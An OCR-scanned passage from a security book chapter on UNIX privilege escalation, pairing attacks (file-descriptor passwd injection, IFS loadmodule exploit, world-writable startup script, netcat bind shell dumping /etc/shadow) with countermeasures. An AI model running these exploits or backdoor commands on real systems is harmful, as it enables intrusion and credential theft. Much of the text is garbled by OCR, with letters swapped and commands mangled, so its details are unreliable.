uid=0 (owned) gid=0 (wheel) groups=0 (wheel) 

Once we su to the owned account, we obtain root access. This entire process only took 
a few lines of c code: 

int 

main () 

{ 

FILE *f; 
int count; 

f = fdopen (FDTOUSE, "a"); 

for (count = 0; count != 30000; count++) 

fprintf (f, "owned :: 0 : 0 :: 0 : 0 : OWNED, ,,: /tmp : /bin/bash\n" ) ; 
exit ( 0 ) ; 

} 



Exploit code provided by Mark Zielinski. 

Q File Descriptor Countermeasure 

Programmers of SUID files should evaluate whether they have allocated their file 
descriptors properly. The close-on-exec flag should be set when the execve ( ) system 
call is executed. As mentioned previously, remove the SUID bits on any program where 
they are not absolutely necessary. 




Race Conditions 



Popularity: 


8 


Simplicity: 


5 


Impact: 


9 


Risk Rating: 


7 
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In most physical assaults, attackers will take advantage of victims when they are most 
vulnerable. This axiom holds true in the cyberworld as well. Attackers will take advan- 
tage of a program or process while if is performing a privileged operafion. Typically fhis 
includes liming fhe attack fo abuse fhe program or process after it enters a privileged 
mode but before if gives up ifs privileges. Mosf limes, fhere is a limifed window for af- 
fackers fo abscond wifh fheir boofy. A vulnerabilify fhaf allows attackers fo abuse fhis 
window of opporfunify is called a race condition. If fhe attackers successfully manage fo 
compromise fhe file or process during ifs privileged sfafe, if is called "wirming fhe race." 
There are many differenf l 5 ^es of race conditions. We are going fo focus on fhose fhaf 
deal wifh signal handling as fhey are very common. 

Signal Handling Issues 

Signals are a mechanism in UNIX used fo notify a process fhaf some particular condition 
has occurred and provide a mechanism fo handle as 5 mchronous evenfs. For insfance, 
when users wanf fo suspend a miming program, fhey press CTRL-Z. This acfually sends a 
S I GT STP fo all processes in fhe foreground process group. In fhis regard, signals are used 
fo alfer fhe flow of a program. Once again, fhe red flag should be popping up when we 
discuss anyfhing thaf can alfer fhe flow of a miming program. The abilify fo alfer fhe flow 
of a miming program is one of fhe main securify issues relafed fo signal handling. Keep in 
mind SIGTSTP is only one f 5 ^e of signal; fhere are over 30 signals fhaf can be used. 

An example of signal handling abuse is fhe wu-ffpd v2.4 signal handling vulnerabil- 
ify discovered in lafe 1996. This vulnerabilify allowed bofh regular and anonymous users 
fo access files as roof. If was caused by a bug in fhe FTP server relafed fo how signals were 
handled. The FTP server insfalled two signal hmdlers as parf of ifs sfarfup procedure. 
One signal handler was used fo cafch SIGPIPE signals when fhe confrol/dafa porf con- 
nection closed. The ofher signal handler was used fo cafch SIGURG signals when 
ouf-of-band signaling was received via fhe ABOR (aborf file frmsfer) command. 
Normally, when a user logs in fo an FTP server, fhe server runs wifh fhe effecfive UID of 
fhe user and nof wifh roof privileges. However, if a dafa coimecfion is unexpecfedly 
closed, fhe SIGPIPE signal is senf fo fhe FTP server. The FTP server jumps fo fhe 
dologout ( ) function and raises ifs privileges fo roof (UID 0). The server adds a logouf 
record fo fhe sysfem log file, closes fhe xf erlog log file, removes fhe user's insfance of 
fhe server from fhe process fable, and exifs. If is fhe poinf af which fhe server changes ifs 
effecfive UID fo 0 fhaf if is vulnerable fo affack. Affackers would have fo send a SIGURG 
fo fhe FTP server while ifs effecfive UID is 0, inferrupf fhe server while if is frying fo log 
ouf fhe user, and have if jump back fo fhe server's main command loop. This creafes a 
race condifion where fhe affackers musf issue fhe S I GURG signal after fhe server changes 
ifs effecfive UID fo 0 buf before fhe user is successfully logged ouf. If fhe affackers are suc- 
cessful (which may fake a few fries), fhey will still be logged in fo fhe FTP server wifh roof 
privileges. Af fhis poinf, affackers can put or get any file fhey like md pofenfially exe- 
cufe commands wifh roof privileges. 

Q Signal Handling Countermeasure 

Proper signal handling is imperative when dealing wifh SUID files. There is nof 
much end users can do fo ensure fhaf fhe programs they run trap signals in a secure 
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manner — it's up to the programmers. As mentioned time and time again, reduce the num- 
ber of SUID files on each sysfem, and apply all relevanf vendor-relafed securify pafches. 




Core-File Manipulation 



Popularity: 


7 


Simplicity: 


9 


Impact: 


4 


Risk Rating: 


7 



Having a program dump core when execufed is more fhan a minor armoyance, if 
could be a major securify hole. There is a lof of sensitive informafion fhaf is stored in 
memory when a UNIX sysfem is miming, including password hashes read from fhe 
shadow password file. One example of a core-file manipulation vulnerability was found 
in older versions of FTPD. FTPD allowed attackers to cause fhe FTP server to write a 
world-readable core file fo fhe roof direcfory of fhe file sysfem if fhe P AS V command were 
issued before logging in fo fhe server. The core file confained portions of fhe shadow 
password file, and in many cases, users' password hashes. If password hashes were re- 
coverable from fhe core file, attackers could pofenfially crack a privileged accounf and 
gain roof access fo fhe vulnerable sysfem. 

O Core-File Countermeasure 

Core files are necessary evils. While fhey may provide attackers wifh sensifive informa- 
fion, fhey can also provide a sysfem adminisfrafor wifh valuable informafion in fhe evenf 
fhaf a program crashes. Based on your securify requiremenfs, if is possible fo resfricf fhe 
sysfem from generating a core file by using fhe u limit command. By setting ulimit fo 
0 in your sysfem profile, you furn off core-file generation. Consul! ul imit's man page on 
your sysfem for more informafion. 

[tsunami] $ ulimit -a 

core file size (blocks) unlimited 

[tsunami] $ ulimit -c 0 

[tsunami] $ ulimit -a 

core file size (blocks) 0 




Shared Libraries 



Popularity: 


4 


Simplicity: 


4 


Impact: 


9 


Risk Rating: 


6 



Chapter 8: Hacking UNIX 



351 





Shared libraries allow executable files to call discrete pieces of code from a common li- 
brary when executed. This code is linked to a host-shared library during compilation. 
When the program is executed, a target-shared library is referenced and the necessary 
code is available to the rurming program. The main advantages of using shared libraries 
are to save system disk and memory, and to make it easier to maintain the code. Updating 
a shared library effectively updates any program that uses the shared library. Of course, 
there is a security price to pay for this convenience. If attackers were able to modify a 
shared library or provide an alternate shared library via an environment variable, the at- 
tackers could gain root access. 

An example of this t 5 ^e of vulnerability occurred in the in.telnetd environment 
vulnerability (CERT advisory CA-95.14). This is an ancient vulnerability, but makes a 
nice example. Essentially, some versions of in . telnetd allow environmental variables 
to be passed to the remote system when a user attempts to establish a connection (REC 
1408 and 1572). Thus, attackers could modify their LD_PRELOAD environmental vari- 
able when logging in to a system via telnet and gain root access. 

To successfully exploit this vulnerability, attackers had to place a modified shared li- 
brary on the target system by any means possible. Next, attackers would modify their 
LD_PRELOAD environment variable to point to the modified shared library upon login. 
When in.telnetd executed /bin/login to authenticate the user, the system's dy- 
namic linker would load the modified library and override the normal library call. This 
allowed the attackers to execute code with root privileges. 

Shared Libraries Countermeasure 

Dynamic linkers should ignore the LD_PRELOAD environment variable for SUID root 
binaries. Purists may argue that shared libraries should be well written and safe for them 
to be specified in LD_PRELOAD. In reality there are going to be programming flaws in 
these libraries that would expose the system to attack when a SUID binary is executed. 
Moreover, shared libraries (for example, /usr/lib or /lib) should be protected with 
the same level of security as the most sensitive files. If attackers can gain access to 
/usr/lib or /lib, the system is toast. 

Kernel Flaws 

It is no secret that UNIX is a complex and highly robust operating system. With this com- 
plexity, UNIX and other advanced operating systems will inevitably have some sort of 
programming flaws. Por UNIX systems, the most devastating security flaws are associ- 
ated with the kernel itself. The UNIX kernel is the core component of the operating sys- 
tem that enforces the overall security model of the system. This model includes honoring 
file and directory permissions, the escalation and relinquishment of privileges from SUID 
files, how the system reacts to signals, and so on. If a security flaw occurs in the kernel it- 
self, the security of the entire system is in grave danger. 

An example of a kernel flaw that affects millions of systems was discovered in June 
2000 and is related to almost all Linux 2.2.x kernels developed as of that date. This flaw is 
related to POSIX "capabilities" that were recently implemented in the Linux kernel. 
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These capabilities were designed to enable more control over what privileged processes 
can do. Essentially, these capabilities were designed to enhance the security of the overall 
system. Unfortunately, due to a programming flaw, fhe funcfionalify of fhis securify 
measure does nof work as inf ended. This flaw can be exploded by fooling SUID pro- 
grams (for example, sendmail) info nof dropping privileges when fhey should. Thus, 
attackers who have shell access fo a vulnerable sysfem could escalafe fheir privilege fo 
roof. 




Kernel Flaws Countermeasure 

This vulnerabilify affecfs many Linux sysfems and is somefhing fhaf any Linux adminis- 
frafor should pafch immediafely. Luckily, fhe fix is fairly sfraighfforward. For 2.2.x kernel 
users, simply upgrade fhe kernel fo version 2.2.16 or higher. 

System Misconfiguration 

We have fried fo discuss common vulnerabilifies and mefhods affackers can use fo ex- 
ploit fhese vulnerabilifies and gain privileged access. This lisf is fairly comprehensive, 
buf fhere is a mulfifude of ways affackers could compromise fhe securify of a vulnerable 
sysfem. A sysfem can be compromised because of poor configurafion and adminisfrafion 
practices. A sysfem can be exfremely secure ouf of fhe box, buf if fhe sysfem adminisfrafor 
changes fhe permission of fhe /etc/passwd file fo be world wrifable, all securify jusf 
goes ouf fhe window. If is fhe human facfor fhaf will be fhe undoing of mosf sysfems. 



File and Directory Permissions 



Popularity: 


8 


Simplicity: 


9 


Impact: 


7 


Risk Rating: 


8 



UNIX's simplicify and power sfem from ifs use of files — ^be fhey binary execufables, 
fexf-based configurafion files, or devices. Everyfhing is a file wifh associafed permis- 
sions. If fhe permissions are weak ouf of fhe box, or fhe sysfem adminisfrafor changes 
fhem, fhe securify of fhe sysfem can be severely affecfed. The fwo biggesf avenues of 
abuse relafed fo SUID roof files and world-wrifable files are discussed nexf. Device secu- 
rify (/dev) is nof addressed in defail in fhis fexf because of space consfrainfs; however, if 
is equally imporfanf fo ensure fhaf device permissions are sef correcfly. Affackers who 
can creafe devices or read or wrife fo sensitive sysfem resources such as / dev / kmem or fo 
fhe raw disk will surely attain roof access. Some inferesfing proof-of-concepf code was 
developed by Mixfer and can be found af http: / / mixfer.warrior2k.com / rawpowr.c. This 
code is nof for fhe fainf of hearf as if has fhe pofenfial fo damage your file sysfem. If 
should only be run on a fesf sysfem where damaging fhe file sysfem is nof a concern. 
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SUID Files Set user ID (SUID) and set group ID (SGID) root files kill. Period! No other 
file on a UNIX sysfem is subject to more abuse than a SUID root file. Almost every attack 
previously mentioned abused a process that was rurming with root privileges — most 
were SUID binaries. Buffer overflow, race condifions, and symiink affacks would be vir- 
fually useless unless fhe program were SUID roof. If is unforfunate fhaf mosf UNIX ven- 
dors slap on fhe SUID bit like it was going out of sfyle. Users who don'f care abouf 
security perpetuate this mentality. Many users are too lazy to take a few extra steps to ac- 
complish a given task and would rather have every program run with root privileges. 

To take advantage of fhis sorry sfafe of securify, affackers who gain user access fo a 
sysfem will fry fo identify SUID and SGID files. The attackers will usually begin to find 
all SUID files and creafe a list of files thaf may be useful in gaining roof access. Lef's fake a 
look af fhe resulfs of a find on a relatively sfock Linux sysfem. The outpuf resulfs have 
been truncafed for brevity. 



[tsunami]# find / -type f -perm -04000 -Is 



-rwsr-xr-x 


1 


root 


root 


30520 


May 


5 


1998 


/ usr/bin/ at 


-rwsr-xr-x 


1 


root 


root 


29928 


Aug 


21 


1998 


/usr/bin/ chage 


-rwsr-xr-x 


1 


root 


root 


29240 


Aug 


21 


1998 


/usr/bin/ gpasswd 


-rwsr-xr-x 


1 


root 


root 


770132 


Oct 


11 


1998 


/ usr/bin/ dos 


-r-sr-sr-x 


1 


root 


root 


13876 


Oct 


2 


1998 


/ usr/bin/ Ipq 


-r-sr-sr-x 


1 


root 


root 


15068 


Oct 


2 


1998 


/usr/bin/ Ipr 


-r-sr-sr-x 


1 


root 


root 


14732 


Oct 


2 


1998 


/usr/bin/ Iprm 


-rwsr-xr-x 


1 


root 


root 


42156 


Oct 


2 


1998 


/usr/bin/ nwsf ind 


-r-sr-xr-x 


1 


root 


bin 


15613 


Apr 


27 


1998 


/usr/bin /passwd 


-rws — X — X 


2 


root 


root 


464140 


Sep 


10 


1998 


/usr/bin/ suidperl 



<output truncated for brevity> 

Most of fhe programs lisfed (for example, chage and passwd) required SUID privi- 
leges fo run correcfly. Affackers will focus on fhose SUID binaries fhaf have been prob- 
lematic in fhe pasf or fhaf have a high propensify for vulnerabilifies based on fheir 
complexify. The dos program would be a greaf place fo sfarf. Dos is a program fhaf cre- 
afes a virfual machine and requires direct access to the system hardware for cerfain oper- 
ations. Attackers are always looking for SUID programs fhaf look ouf of fhe ordinary or 
fhaf may nof have undergone fhe scrutiny of ofher SUID programs. Lef's perform a bit of 
research on fhe dos program by consulfing fhe dos HOWTO documenfation. We are in- 
feresfed in seeing if fhere are any securify vulnerabilities in running dos SUID. If so, this 
may be a potential avenue of affack. 

The dos HOWTO sfafes: "Alfhough dosemu drops root privilege wherever possible, 
it is still safer fo nof run dosemu as roof, especially if you run DPMI programs under 
dosemu. Most normal DOS applications don't need dosemu to rim as root, especially if 
you run dosemu under X. Thus you should not allow users to run a suid root copy of dosemu, 
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wherever possible, but only a non-suid copy. You can configure this on a per-user basis using 
the / etc/dosemu .users file." 

The documentation clearly states that it is advisable for users to run a non-SUID copy. 
On our test system, there is no such restriction in the /etc/dosemu .users file. This 
type of misconfiguration is just what attackers look for. A file exists on the system where 
the propensity for root compromise is high. Attackers would determine if there were any 
avenues of attack by directly executing do s as SUID, or if there are other ancillary vulner- 
abilities that could be exploited, such as buffer overflows, symlink problems, and so on. 
This is a classic case of having a program unnecessarily SUID root, and it poses a signifi- 
cant security risk to the system. 

SUID Files Countermeasure 

The best prevention against SUID/SGID attacks is to remove the SUID/SGID bit on as 
many files as possible. It is difficult to give a definitive list of files that should not be SUID, 
as there is a large variation among UNIX vendors. Gonsequently, any list that we could 
provide would be incomplete. Our best advice is to inventory every SUID/SGID file on 
your system and to be sure that it is absolutely necessary for that file to have root-level 
privileges. You should use the same methods attackers would use to determine if a file 
should be SUID. Find all the SUID/SGID files and start your research. 

The following command will find all SUID files: 

find / -type f -perm -04000 -Is 

The following command will find all SGID files: 
find / -type f -perm -02000 -Is 

Gonsult the man page, user documentation, and HOWTOs to determine if the author 
and others recommend removing the SUID bit on the program in question. You may be 
surprised at the end of your SUID / SGID evaluation to find how many files don't require 
SUID / SGID privileges. As always, you should try your changes in a test environment be- 
fore just writing a script that removes the SUID / SGID bit from every file on your system. 
Keep in mind, there will be a small number of files on every system that must be SUID for 
the system to function normally. 

Linux users can use Bastille (http: / / www.bastille-linux.org/) to harden their system 
against many of the aforementioned local attacks, especially to help remove the SUID 
from various files. Bastille is a fantastic utility that draws from every major reputable 
source on Linux security and incorporates their recommendations into an automated 
hardening tool. Bastille was originally designed to harden RedHat systems (which need a 
lot of hardening); however, version 1.10 and above make it much easier to adapt to other 
Linux distributions. 

World-Writable Files Another common system misconfiguration is setting sensitive files 
to world writable, allowing any user to modify the file. Similar to SUID files, world 
writables are normally set as a matter of convenience. However, there are grave security 
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consequences in setting a critical system file as world writable. Attackers will not over- 
look the obvious, even if fhe sysfem adminisfrafor has. Common files fhaf may be sef 
world wrifable include sysfem inifializafion files, critical sysfem configurafion files, and 
user sfarfup files. Lef's discuss how attackers find and exploif world-wrifable files. 

find / -perm -2 -type f -print 

The find command is used fo locale world-wrifable files. 

/etc/rc.d/rc3.d/S991ocal 
/var /tmp 

/var/tmp/ .Xll-unix 

/var/tmp/ .Xll-unix/XO 

/var/tmp/ . font-unix 

/var /lib /games /xga Is cores 

/var/lib/news/innd/ctlinnda28392 

/ var/ lib/news /innd/ctlinndal 8 685 

/var /spool/ fax/ out going 

/var /spool/ fax/ out going/ locks 

/home /public 

Based on fhe resulfs, we can see several problems. Firsf, /etc/rc . d/rc3 . d/ 
S991ocalisa world-wrifable sfarfup scrip!. This sifuafion is exfremely dangerous, as af- 
fackers can easily gain roof access fo fhis sysfem. When fhe sysfem is sfarfed, S991ocal 
is execufed wifh roof privileges. Thus, attackers could creafe a SUID shell fhe nexf time 
fhe sysfem is resfarfed by performing fhe following: 

[tsunami] $ echo "/bin/cp /bin/sh /tmp/ . sh ; /bin/chmod 4755 /tmp/.sh" \ 
/etc/rc . d/rc3 . d/S991ocal 

The nexf time fhe sysfem is reboofed, a SUID shell will be creafed in /tmp. In addi- 
tion, fhe /home/public directory is world wrifable. Thus, attackers can overwrite any 
file in fhe directory via fhe mv command. This is possible because fhe direcfory permis- 
sions supersede fhe file permissions. Typically, attackers would modify fhe public us- 
ers shell sfarfup files (for example, .login or .bashrc) fo creafe a SUID user file. After 
public logs in fo fhe sysfem, a SUID public shell will be waiting for fhe attackers. 

Q World-Writable Files Countermeasure 

If is good practice fo find all world-wrifable files and directories on every sysfem you 
are responsible for. Change any file or direcfory fhaf does nof have a valid reason for be- 
ing world wrifable. If can be hard fo decide whaf should and shouldn'f be world wrifable, 
so fhe besf advice we can give is common sense. If fhe file is a sysfem inifializafion file, 
critical sysfem configurafion file, or user sfarfup file, if should nof be world wrifable. 
Keep in mind fhaf if is necessary for some devices in / dev fo be world wrifable. Evaluate 
each change carefully and make sure you fesf your changes fhoroughly. 
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Extended file attributes are beyond the scope of this text, but worth mentioning. 
Many systems can be made more secure by enabling read-only, append, and immutable 
flags on certain key files. Linux (via chatt r) and many of the BSD variants provide addi- 
tional flags that are seldom used but should be. Combine these extended file attributes 
with kernel security levels (where supported), and your file security will be greatly en- 
hanced. 



Shell Attacks 



Popularity: 


6 


Simplicity: 


6 


Impact: 


7 


Risk Rating: 


6 



The UNIX shell is extremely powerful and affords its users many conveniences. One 
of the major features of the UNIX shell environment is its ability to program commands 
as well as to set specific options that govern the way the shell operates. Of course, with 
this power come risk and many avenues of attack. One common avenue of attack is abus- 
ing the Internal Field Separator (IPS) variable. 

IFS Attacks 

The IFS variable is used to delimit input words used in a shell environment. The IFS vari- 
able is normally set to a space character, which is the default shell behavior for delimiting 
shell commands. If attackers can manipulate the IFS variable, they may be able to trick a 
SUID program into executing a Trojan file that will reward the attackers with root privi- 
leges. T 5 ^ically, a SUID shell script is tricked into giving up root access; however, our ex- 
ample uses the loadmodule program. 

The loadmodule module exploit is a well-known attack that was discovered several 
years ago and exploits an IFS vulnerability in SunOS 4.1.x. 

# ! /bin/csh 
cd /tmp 
mkdir bin 
cd bin 

cat > bin « EOF<R #!/bin/sh 
sh -I 
EOF 

chmod 755 /tmp/bin/bin 
setenv IFS / 

/usr/openwin/bin/ loadmodule / sys/sun4c/OBJ/evqmod-sun4c . o /etc/openwin/modules/evqload 

The preceding exploit script changes the current directory to /tmp and creates a child 
directory named /bin. As is frequently the case, the exploit creates a copy of /bin/sh 
that will be executed shortly. Next, it sets the IFS variable to a " / " rather than a space. Be- 
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cause the IPS is changed to a the SUID program loadmodule is tricked into executing 
the program / tmp / bin/bin. The end result is a handy SUID shell waiting for the attackers . 

O IFS Countermeasure 

Most times, the system ( ) function call is the culprit of an IFS attack. This funcfion call 
uses sh to parse the string that it executes. A simple wrapper program can be used to in- 
voke such problematic programs and automatically sets the IFS variable to a space. An 
example of such code is as follows: 

#define EXECPATH " /usr/bin/real/ " 
main(int argc, char **argv) 

{ 

char pathname [ 1024 ] ; 

if ( strlen (EXECPATH) + strlen (argv [ 0 ] ) + 1> 1024) 
exit (-1 ) ; 

strcpy (pathname, EXECPATH); 
strcat (pathname, argv[0]); 
putenv("IFS= \n\t"); 
execv (pathname, argv, argc); 



Code provided by Jeremy Rauch. 

Fortunately, most new versions of UNIX ignore the IFS variable if the shell is running 
as root and the effective UID is different from the real UID. The best advice is to never cre- 
ate SUID shell scripts and to keep SUID files to a minimum. 



AFTER HACKING ROOT 

Once the adrenaline rush of obfaining roof access has subsided, the real work begins for 
fhe attackers. They wanf fo exploif your system by hoovering all the files for information, 
loading up sniffers fo capfure telnet, ftp, pop, and snmp passwords, and finally, at- 
facking yef fhe next victim from your box. Almosf all these techniques, however, are 
predicated on the uploading of a cusfomized roofkit. 




Rootkits 



Popularity: 


9 


Simplicity: 


9 


Impact: 


9 


Risk Rating: 


9 
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The initially compromised system will now become the central access point for all 
future attacks, so it will be important for fhe affackers fo upload and hide fheir 
roofkifs. A UNIX roofkif fypically consisfs of four groups of fools all geared fo fhe spe- 
cific plafform type and version: (1) Trojan programs such as altered versions of login, 
netstat, and ps; (2) back doors such as inetd inserfions; (3) inferface sniffers; and 
(4) sysfem log cleaners. 

Trojans 

Once affackers have obfained roof, fhey can "Trojanize" jusf abouf any command on 
fhe sysfem. Thaf's why if is crifical fhaf you check fhe size and dafe/ time sfamp on all 
your binaries, buf especially on your mosf frequenfly used programs, such as login, 
su, telnet, ftp, passwd, netstat, ifconfig. Is, ps, ssh, find, du, df, sync, 
reboot, halt, shutdown, and so on. 

For example, a common Trojan in many roofkifs is a hacked-up version of login. 
The program will log in a user jusf as fhe normal login command does; however, if 
will also log fhe inpuffed username and password fo a file. There is a hacked-up ver- 
sion of s sh ouf fhere as well fhaf will perform fhe same function. 

Anofher Trojan may creafe a back door info your sysfem by rurming a TCP lisfener 
and shoveling back a UNIX shell. For example, fhe 1 s command may check for fhe exis- 
fence of an already running Trojan and, if nof already running, will fire up a hacked-up 
version of netcat fhaf will send back /bin/ sh when affackers connecf fo if. The fol- 
lowing, for insfance, will run netcat in fhe background, seffing if fo lisfen fo a cormec- 
fion affempf on TCP porf 222 and fhen fo shovel /bin/ sh back when cormecfed: 

[tsunami]# nohup nc -1 -p 222 -nw -e /bin/sh & 

listening on [any] 222 . . . 

The affackers will fhen see fhe following when fhey connecf fo TCP porf 222, and 
fhey can do anyfhing roof can do: 

[rumble]# nc -nw 24.8.128.204 222 

(UNKNOWN) [192.168.1.100] 222 (?) open 

cat /etc /shadow 

root :ar90alrR10r4 1:10783: 0:99999:7:-!: -1:134530596 
bin:*:10639:0:99999:7: : : 
daemon :*:10639:0:99999:7: : : 
adm:*:10639:0:99999:7: : : 



The number of pofenfial Trojan fechniques is Umifed only by fhe affacker's imagina- 
tion (which fends fo be expansive). Ofher Trojan fechniques are uncovered in Chapfer 14. 

VigUanf monitoring and inventorying of all your listening ports wiU prevent this type 
of attack, buf your besf countermeasure is fo prevenf binary modification in fhe firsf place. 
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O Trojan Countermeasure 

Without the proper tools, many of these Trojans will be difficult to detect. They often 
have the same file size and can be changed fo have fhe same dale as fhe original pro- 
grams — so relying on sfandard idenfificafion fechniques will nof suffice. You'll need a 
crypfographic checksum program fo perform a unique signafure for each binary file and 
need fo sfore fhese signafures in a secure manner (such as a disk offsife in a safe deposif 
box). Programs like Tripwire (hffp: / / www.fripwire.com) and md5 sum are fhe mosf pop- 
ular checksumming fools, enabling you fo record a unique signafure for all your pro- 
grams and fo definitively defermine when attackers have changed a binary. Ottenfimes 
admins will forgef abouf creating checksums until after a compromise has been defecfed. 
Obviously, fhis is nof fhe ideal solution. Luckily, some sysfems have package manage- 
menf funcfionalify fhaf already has sfrong hashing builf in. For example, many flavors of 
Linux use fhe RedHaf Package Manager (RPM) formaf. Parf of fhe RPM specification in- 
cludes MD5 checksums. So how can fhis help after a compromise? By using a known 
good copy of rpm, you can query a package fhaf has nof been compromised fo see if any 
binaries associafed wifh fhaf package were changed: 

[©shadow]# rpm -Vvp ftp : //ftp . redhat . com/pub/redhat/\ 
redhat-6 . 2/i386/RedHat/RPMS/filGutils-4 . 0-21 . 1386 . rpm 



S . 5 . . . . T /bin/ls 




In our example, /bin/ls is parf of fhe fileufils package for RedHaf 6.2. We can see fhaf 
/bin/ls has been changed by fhe exisfence of fhe "5" earlier. This means fhaf fhe MD5 
checksum is differenf befween fhe binary and fhe package — a good indication fhaf fhis 
box is owned. 

For Solaris sysfems, a complefe dafabase of known MD5 sums can be obfained from 
hffp://sunsolve.sun.com/pub-cgi/tileFingerprinfs.pl. This is fhe Solaris Fingerprint 
Database maintained by Sun and will come in handy one day if you are a Solaris admin. 

Of course, once your sysfem has been compromised, never rely on backup fapes fo re- 
store your sysfem — fhey are mosf likely infected as well. To properly recover from an af- 
fack, you'll have fo rebuild your sysfem from fhe original media. 

Sniffers 

Having your sysfem(s) "roofed" is bad, buf perhaps fhe worsf oufcome of fhis vulnerable 
position is having a network eavesdropping ufilify rnsfalled on fhe compromised hosf. 
Snijfers, as fhey are commonly called (after fhe popular network monitoring software from 
Network General — ^now part of Network Associates, Inc.), could arguably be called the 
most damaging tool employed by malicious attackers. This is primarily because sniffers al- 
low attackers to strike at every system that sends traffic to the compromised host and at any 
others sitting on the local network segment totally oblivious to a spy in their midst. 
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What Is a Sniffer? 

Sniffers arose ouf of fhe need for a fool fo debug networking problems. They essentially 
capture, interpret, and store for later analysis packets traversing a network. This provides 
network engineers a window on what is occurring over the wire, allowing them to trou- 
bleshoot or model network behavior by viewing packet traffic in its most raw form. An 
example of such a packet trace appears next. The user ID is "guest" with a password of 
"guest." All commands subsequent to login appear as well. 

[SYN] (slot 1) 

pc6 => targets [23] 

%&& #' $ANSI "! guest 

guest 

Is 

cd / 

Is 

cd /etc 

cat /etc/passwd 

more hosts. equiv 

more /root / . bash_history 

Like most powerful tools in the network administrator's toolkit, this one was also 
subverted over the years to perform duties for malicious hackers. You can imagine the 
unlimited amount of sensitive data that passes over a busy network in just a short time. 
The data includes username/ password pairs, confidential email messages, file transfers 
of proprietary formulas, and reports. At one time or another, if it gets sent onto a network, 
it gets translated into bits and bytes that are visible to an eavesdropper employing a 
sniffer at any jimcture along the path taken by the data. 

Although we wiU discuss ways to protect network data from such prying eyes, we hope 
you are begirtning to see why we feel sniffers are one of the most dangerous tools employed by 
attackers. Nothing is secure on a network where sniffers have been installed because all data 
sent over the wire is essentially wide open. Dsniff (http: / /www.monkey.org/ -dugsong/) is 
our favorite sniffer and can be foimd at http: / / packetstorm.securify.com/ sniffers/ along with 
many other popular sniffer programs. 

How Sniffers Work 

The simplest way to understand their function is to examine how an Ethernet-based 
sniffer works. Of course, sniffers exist for just about every other type of network media, 
but since Ethernet is the most common we'll stick to it. The same principles generally ap- 
ply to other networking architectures. 

/Vn Ethernet sniffer is software that works in concert with the network interface card 
(NIC) to blindly suck up all traffic within "earshot" of the listening system, rather than 
just the traffic addressed to the sniffing host. Normally, an Ethernet NIC will discard any 
traffic not specifically addressed to itself or the network broadcast address, so the card 
must be put in a special state called promiscuous mode to enable it to receive all packets 
floating by on the wire. 
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Once the network hardware is in promiscuous mode, the sniffer soffware can capfure 
and analyze any traffic fhat fraverses fhe local Efhemef segmenf . This limifs fhe range of a 
sniffer somewhaf, as if will not be able to listen to traffic oufside of fhe local network's col- 
lision domain (thaf is, beyond roufers, swifches, or ofher segmenting devices). Obvi- 
ously, a sniffer judiciously placed on a backbone, infer-nefwork link, or ofher network 
aggregation point will be able to monitor a greater volume of fraffic fhan one placed on an 
isolafed Efhemef segmenf. 

Now fhaf we've esfablished a high-level undersfanding of how sniffers function, lef's 
fake a look at some popular sniffers and how fo defecf fhem. 

Popular Sniffers 

Table 8-2 is hardly mean! to be exhaustive, but these are the tools that we have encoun- 
tered (and employed) most often in our years of combined security assessments. 

Q Sniffer Countermeasures 

There are three basic approaches to defeating sniffers planfed in your environmenf. 

Migrate to Switched Network Topoiogies Shared Ethernet is extremely vulnerable to sniff- 
ing because all traffic is broadcast to any machine on the local segment. Switched 



Name 


Location 


Description 


Sniffit by Brecht 


http : / / reptile.rug.ac .be / 


A simple packet sniffer 


Claerhout 


-coder /sniffit/ sniffit.html 


fhaf runs on Linux, 


("coder") 




SunOS, Solaris, EreeBSD, 
and Irix 


tcpdump 3.x by 


http:/ /www-nrg. ee.lbl.gov/ 


The classic packef 


Steve McCanne, 




analysis fool fhaf has 


Craig Leres, and 




been porfed fo a wide 


Van Jacobson 




variefy of plafforms 


linsnif f by 


http:/ / www.rootshell.com/ 


Designed fo sniff Linux 


Mike Edulla 




passwords 


solsnif f by 


http:/ / WWW. rootshell.com/ 


A sniffer modified fo run 


Michael R. Widner 




on Sun Solaris 2.x 
sysfems 


Dsnif f 


http:/ / WWW. monkey.org/ 


One of fhe mosf capable 




-dugsong 


sniffers available 


snort 


http:/ / www.snort.org 


A greaf all-arormd sniffer 


Table 8-2. Popular, Freely Available UNIX Sniffer Software 
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Ethernet essentially places each host in its own collision domain, so that only traffic des- 
tined for specific hosfs (and broadcasf fraffic) reaches fhe NIC, nofhing more. An added 
bonus fo moving fo swifched nefworking is fhe increase in performance. Wifh fhe cosfs of 
swifched equipmenf nearly equal fo fhaf of shared equipmenf, fhere really is no excuse fo 
purchase shared Efhernef fechnologies any more. If your company's accounting deparf- 
menf jusf doesn'f see fhe lighf, show fhem fheir passwords capfured using one of fhe pro- 
grams specified earlier — fhey'll reconsider. 

While swifched networks help to defeat unsophisticated attackers, they can be easily sub- 
verted to sniff fhe local network. A program such as arpredirect, part of fhe dsniff package 
by Dug Song (hffp:/ /www.monkey.org/~dugsong/dsniff/), can easily subvert the security 
provided by most switches. See Chapter 10 for a complefe discussion of arpredirect. 

Detecting Sniffers There are two basic approaches to detecting sniffers: host based and 
network based. The most direct host-based approach is to determine if the target system's 
network card is operating in promiscuous mode. On UNIX, there are several programs 
that can accomplish this, including Check Promiscuous Mode (cpm) from Carnegie 
Mellon University (available at ftp://info.cert.org/pub/tools/). 

Sniffers are also visible in the Process List and tend to create large log files over time, 
so simple UNIX scripts using ps, Isof, and grep can illuminate suspicious sniffer-like 
activity. Intelligent intruders will almost always disguise the sniffer's process and at- 
tempt to hide the log files it creates in a hidden directory, so these techniques are not al- 
ways effective. 

Network-based sniffer detection has been hypothesized for a long time, but only until 
relatively recently has someone written a tool to perform such a task: AntiSniff from the 
security research group known as the LOpht (http://www.10pht.com/). Unfortunately, 
the first version runs only on Windows, but the technical underpirmings look sound 
enough to provide a central point from which to scan a network for promiscuous mode 
interfaces. In addition to AntiSniff, sentinel (http://www.packetfactory.net/ 
Projects /Sentinel/) can be run from a UNIX system and has advanced network-based 
promiscuous mode detection features. 

Encryption (SSH, IPSec) The long-term solution to network eavesdropping is encr 5 q)tion. 
Only if end-to-end encr}q)tion is employed can near-complete confidence in the integrity 
of communication be achieved. Encr 5 q)tion key length should be determined based on 
the amount of time the data remains sensitive — shorter encr 5 q)tion key lengths (40 bits) 
are permissible for encr 5 q)ting data streams that contain rapidly outdated data and will 
also boost performance. 

Secure Shell (SSH) has long served the UNIX commimity where encr)q)ted remote 
login was needed. Tree versions for noncommercial, educational use can be found at 
http: / /www.ssh.org/ download.html, while a commercial version called P-Secure Tun- 
